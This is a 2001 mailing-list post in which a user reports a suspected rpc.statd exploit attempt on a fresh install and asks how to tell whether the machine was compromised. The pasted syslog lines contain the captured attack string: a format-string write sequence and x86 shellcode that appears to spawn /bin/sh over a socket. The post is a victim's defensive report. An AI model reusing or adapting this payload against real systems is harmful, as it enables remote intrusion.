I saw messages on this list from early in the year about an rpc.statd
exploit, and I believe it just happened to me. I'd appreciate any help
from you all. I'm on a new 2.2 install from CD-ROM; both nfs-common
and nfs-kernel-server are version 0.1.9.1-1. Someone on this list said
that this problem "is becoming a FAQ" as a "failed crack attempt";
what I'd like to know from you all is a) was this failed -- is there
any way of knowing whether or not I've been cracked and b) what should
I do next?
What happened was all logged-in terminals (and xterms) received the
following:
-------------------------------------
Message from syslogd@gatsby at Fri Jun 15 14:17:10 2001 ...
gatsby
-------------------------------------
I noticed that control-g stopped working (no bell) and the following
showed up in /var/log/syslog (with a similar display in
/var/log/messages):
-------------------------------------
Jun 15 14:17:10 gatsby
Jun 15 14:17:10 gatsby syslogd: Cannot glue message parts together
Jun 15 14:17:10 gatsby 173>Jun 15 14:17:10 /sbin/rpc.statd[156]: gethostbyname error
for
^X÷ÿ¿^X÷ÿ¿^Y÷ÿ¿^Y÷ÿ¿^Z÷ÿ¿^Z÷ÿ¿^[÷ÿ¿^[÷ÿ¿%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%n1Àë|Y‰A^P‰A^HþÀ‰A^D‰ÃþÀ‰^A!
°fÍ€³^B‰Y^LÆA^N™ÆA^H^P‰I^D€A^D^Lˆ^A°fÍ€³^D°fÍ€³^E0ÀˆA^D°fÍ
Jun 15 14:17:10 gatsby Ç^F/binÇF^D/shA0ÀˆF^G‰v^LV^PN^L‰ó°^KÍ€°^AÍ€èÿÿÿ
-------------------------------------
--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
